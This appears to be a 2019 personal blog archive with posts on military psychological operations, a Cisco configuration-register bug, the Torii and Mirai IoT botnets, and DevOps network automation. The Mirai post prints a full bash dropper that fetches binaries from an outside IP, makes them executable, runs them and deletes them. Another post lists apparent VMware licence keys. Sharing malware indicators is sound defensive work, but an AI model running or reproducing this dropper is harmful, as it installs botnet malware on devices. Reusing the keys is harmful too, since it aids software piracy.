Wednesday, August 28, 2019

PSYOPS - Psychological Warfare

MOTTO

  • DA MIHI LIBERTATEM AUT MORTEM
  • GIVE ME LIBERTY OR GIVE ME DEATH
  • DEJTE MI SVOBODU NEBO SMRT

Úkoly PSYOPS jsou:

  • oslabit odhodlání cílových skupin protivníka, či potenciálního protivníka klást odpor nebo vést aktivní bojovou činnost
  • přispět k celkovému hodnocení situace v prostoru operace z pohledu psychologického dopadu našich vojenských činností na příslušníky druhé strany
  • posílit podporu spojenců pro vytyčené politické a vojenské cíle
  • Získat podporu a spolupráci nezúčastněných a nerozhodnutých cílových skupin

Základní definice PSYOPS zní:

Plánované a cílevědomé psychologické působení na cílové skupiny, prováděné v době míru, za stavu vnějšího ohrožení státu a v době války, zaměřené na cílové skupiny k ovlivnění jejich postojů a chování, pro dosažení politických a vojenských cílů stanovených představiteli státu a Armády České Republiky.

Cílem :

je změnít přístup a chování cílových skupin tak, aby se shodovaly s vlastními operacemi

 

Monday, August 26, 2019

CISCO Configuration register stuck at 0x3922 - bug CSCvh27335

- bug associated :  CSCvh27335
- multiple platforms affected
- incl. C800 series, C180x series 
- same issue also with Cisco ISR 2811
- changing confreg values doesn't work via ROMMON nor via config
 -------------------------------------------------------------------------------------------------

SOLUTION:

Change the console baud-rate to a default which is 9600.
After the reload a correct 0x2102 value would show up properly.

conf t
  line con 0
    speed 9600
do wr
do sh ver | s register

 -------------------------------------------------------------------------------------------------

MagLab-phys-R01(config-line)#do sh ver 
Cisco IOS Software, C180X Software (C180X-ADVENTERPRISEK9-M), Version 15.1(4)M12a, RELEASE SOFTWARE (fc1)

ROM: System Bootstrap, Version 12.3(8r)YH13, RELEASE SOFTWARE (fc1)

R01 uptime is 3 hours, 25 minutes
System image file is "flash:c180x.bin"
Last reload type: Normal Reload


Cisco 1802 (MPC8500) processor (revision 0x200) with 589824K/65536K bytes of memory.

9 FastEthernet interfaces
1 ISDN Basic Rate interface
1 ATM interface
1 Virtual Private Network (VPN) Module
250880K bytes of ATA CompactFlash (Read/Write)
Configuration register is 0x3922  <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<




 

MagLab-phys-R01#conf t
Enter configuration commands, one per line.  End with CNTL/Z.
MagLab-phys-R01(config)#config-r
MagLab-phys-R01(config)#config-register 0x2102
MagLab-phys-R01(config)# do sh ver | s register
      
Configuration register is 0x3922

MagLab-phys-R01(config)#line con 0
MagLab-phys-R01(config-line)#speed 9600
MagLab-phys-R01(config-line)#do sh ver | s register
         
Configuration register is 0x3922 (will be 0x2102 at next reload)

MagLab-phys-R01(config-line)#
 -------------------------------------------------------------------------------------------------

Sunday, August 25, 2019

Stealthy Torii - a level above Mirai

A large range of internet of things (IoT) devices being attacked by malware with advanced capabilities and the researchers said "its sophistication is a level above anything we have seen before".

2018 has been a year where the Mirai and QBot variants just keep coming. Any script kiddie now can use the Mirai source code, make a few changes, give it a new Japanese-sounding name, and then release it as a new botnet.

As per Avast:
 the Torii tries to be more stealthy and persistent once the device is compromised, and it does not (yet) do the usual stuff a botnet does

Instead, it comes with a quite rich set of features for exfiltration of (sensitive) information, modular architecture capable of fetching and executing other commands and executables and all of it via multiple layers of encrypted communication.

Torii can infect a wide range of devices and it provides support for a wide range of target architectures, including MIPS, ARM, x86, x64, PowerPC, SuperH, and others.

Telnet attacks have been coming to his honeypot from Tor exit nodes, so Avast decided to name this botnet strain “Torii”.

Sentence of the day


 "The measure of success is not determined by how well a process is adhered to, but in how well the exceptions are handled."

- Unknown -

Wednesday, August 14, 2019

VMWare license keys

 GY100-05WDK-H80RZ-4QMNC-XF8U0
GF51K-ATYEN-M815Q-XGQQX-WCHAF
YZ5JU-0XZ95-08DVP-3XQZC-M7HZ2
AY5X2-81FD4-085JP-H4MQT-XKUX0
UZ700-0RZ5H-0882P-9GXEG-WK894
CA1E8-0FD83-4816P-RGWXV-ZCKGF
YZ35U-4PED5-M881Z-87WEV-NY2XA
FC382-DFDDL-4801Q-KNYNT-YVAR6
GA18K-DRXE3-488TZ-J4ZNX-PZAXA
FF590-2DX83-M81LZ-XDM7E-MKUT4

Wednesday, August 7, 2019

New Mirai Variant (KOR, RU) - Different Architectures incl MIPS & ARMv7



Generic.Bash.MiraiA.72271860

-------------------------------

File Identification

MD5: 43f9fc4fbc043cceda8aab0b596010be
Sha1: b8ff8c4b7a85be8d67eb21016bda1690a2effc42
Sha256: 86655593af5eaf3f4055c61a4e86c5b8ac02d330726fbd52dfa2073abc60
----------------
Virbr0

HTTP traffic on port 443 (POST)    192.168.122.21    178.255.209.22    Policy Violation    HTTPon443
----------------

IP    185.70.105.178

URL    http://185.70.105.178/armv5l
URL    http://185.70.105.178/mipsel
URL    http://185.70.105.178/powerpc
URL    http://185.70.105.178/sparc
URL    http://185.70.105.178/i586
URL    http://185.70.105.178/m68k
URL    http://185.70.105.178/i686
URL    http://185.70.105.178/sh4
URL    http://185.70.105.178/mips
URL    http://185.70.105.178/armv6l
URL    http://185.70.105.178/armv7l
URL    http://185.70.105.178/armv4l
URL    http://185.70.105.178/x86

----------------

 File Type: Bourne-Again shell script, ASCII text executable

Analysis Date: Jul. 30, 2019, 9:56 AM
Size: 1.818 KB (1818 bytes)
File Classification: SH

AVAST    BV:Downloader-AAN\ [Drp]    Malware infection

----------------
#!/bin/bash
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.70.105.178/armv4l; chmod +x armv4l; ./armv4l; rm -rf armv4l
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.70.105.178/armv5l; chmod +x armv5l; ./armv5l; rm -rf armv5l
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.70.105.178/armv6l; chmod +x armv6l; ./armv6l; rm -rf armv6l
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.70.105.178/armv7l; chmod +x armv7l; ./armv7l; rm -rf armv7l
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.70.105.178/i586; chmod +x i586; ./i586; rm -rf i586
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.70.105.178/i686; chmod +x i686; ./i686; rm -rf i686
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.70.105.178/m68k; chmod +x m68k; ./m68k; rm -rf m68k
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.70.105.178/mips; chmod +x mips; ./mips; rm -rf mips
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.70.105.178/mipsel; chmod +x mipsel; ./mipsel; rm -rf mipsel
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.70.105.178/powerpc-440fp; chmod +x powerpc-440fp; ./powerpc-440fp; rm -rf powerpc-440fp
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.70.105.178/powerpc; chmod +x powerpc; ./powerpc; rm -rf powerpc
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.70.105.178/sh4; chmod +x sh4; ./sh4; rm -rf sh4
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.70.105.178/sparc; chmod +x sparc; ./sparc; rm -rf sparc
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.70.105.178/x86; chmod +x x86; ./x86; rm -rf x86
----------------

Generic.Bash.MiraiA.72271860

Wednesday, July 3, 2019

Mistakes when adopting DevOps for production network automation

If that sounds a lot like “DevOps is coming to a network near you” then you have perfect pitch, because that’s exactly what’s going on inside enterprises around the globe.

We already have plenty of evidence, empirical and anecdotal, to indicate that use of automation and orchestration in production environments is not an anomaly. In fact, it appears to be accelerating as NetOps teams try to catch up to their DevOps counterparts.

The pressure to reach automated parity with app development environments can lead to skipping the strategy and going right for the tactical approach to adopting a more agile, automated means of making changes to the production pipeline.

That’s not a good thing. Production is not development, and the blast radius is significantly larger in production where there are hundreds -- sometimes thousands -- of applications and business processes relying on shared networking services. You can’t fail fast enough to avoid incurring damages when something goes wrong.

So as automation and orchestration become the norm in production environments, NetOps teams should be mindful of which DevOps practices they embrace and which they don’t. Because when bad habits are really hard to break, the best option is simply to avoid forming them in the first place.
To help you out, here are the top three bad habits you should avoid when adopting DevOps for production network automation and orchestration:

 3 Bad Habits NetOps Should Avoid

 1. Skipping the code review
The State of Code Review 2017 from SmartBear, a supplier of software-quality tools for teams, notes that 74% of developers participate in code reviews. That sounds good, until you realize that means the other 26% aren’t. Unsurprisingly, the No. 1 reason cited for not reviewing code at desired levels is workload.
This is how defects and bugs (excuse me, "undocumented features") creep into software. These are logic and security-based mistakes that can lead to crashes, outages, memory leaks, and even breaches. When you’re writing scripts, and integrating multiple services to automate and orchestrate a process, you are writing code. And if you are writing code, it needs to be reviewed by someone other than you.
Remember, this isn’t testing or QA where you can mess up and it doesn’t impact the business’ bottom line. This will be production, and a single mistake can lead to all sorts of problems. Make the time to conduct code reviews. The benefits are well-documented and include:
  • increased quality of code with higher chance of identifying and eliminating security flaws
  • knowledge sharing -- others learn the process along with the code
  • compliance (ISO 9000/9001)
2. Ignoring maintainability
     According to a 2016 survey conducted by Software Improvement Group and O’Reilly, 70% of respondents "believe that maintainability is the most important aspect of code to measure, even as compared to performance or security."
I hate PERL, and I’m not all that fond of Python. So I’m going to use node.js instead. Or maybe I’m just going to craft some incomprehensible command-line magic with sed, awk, and my friend grep to push this change to that router. Problem is, no one else uses node.js and that command line relies on my system-specific configuration.

     That is not maintainable, and using “whatever language/tool/system” you want to build scripts and services to automate networking makes embracing code reviews really, really hard. It won’t go well for you. If no one else can maintain that code, it becomes yours. For life.

     It’s like the goldfish you begged for when you were eight and now you’re stuck with it.
Standardizing on languages, tools, and systems early is important.

3. Ignoring security Rule Zero
     Every AD&D (Dungeons and Dragons) player, at least all the ones I play with, know about Rule Zero: “The Dungeon Master is the final arbiter of all rule decisions.” It supersedes all other rules in the game, hence the reason it is numbered as zero. In security, we also have a rule zero: “Thou shalt never trust user input. Ever.”

     A number of high-profile outages were caused by ignoring this rule because command-line parameters passed to any script are, by default, user input.  Ignoring this rule may trigger one a resume-generating event by accidentally causing an outage of extreme proportions.

Never trust user input explicitly.

     Whether that’s the IP address of a wiring closet switch or a variable passed to inform a firewall script which port to open or close, don’t blindly execute on it. Instead, always validate input and, if necessary, force the human invoker of the script to verify the input. After all, they might not have meant to push that configuration change to every switch.
     As you proceed with efforts to automate IT in 2018, pay close attention to the habits you’re forming. Avoiding these three bad habits will go a long way toward ensuring a successful and productive year.